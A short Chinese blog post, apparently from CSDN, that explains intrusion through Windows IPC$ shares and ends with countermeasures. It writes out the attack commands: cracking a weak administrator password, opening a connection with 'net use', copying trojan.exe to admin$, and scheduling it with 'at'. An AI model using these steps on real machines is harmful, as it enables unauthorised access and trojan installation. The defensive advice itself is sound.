netant.tk的博客

tony的博客|Windows|PHP|MySQL|学习交流|www.netant.tk

ipc$共享入侵

微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令,那就更可怕了。一条典型的入侵流程如下:
(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。如果你的密码位数不高,又很简单,是很容易被破解的。根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。
(2)使用命令net use //xxx.xxx.xxx.xxx/ipc$“密码” /user:“用户名”建立一个有一定权限的ipc$连接。用copy trojan.exe //xxx.xxx.xxx.xxx/admin$ 将木马程序的服务器端复制到系统目录下。
(3)用net time //xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at //202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。
这样一来,你的电脑就完全被黑客控制了。
应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1),
当然,给自己的帐户加上强壮的口令才是最关键的。
阅读更多
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭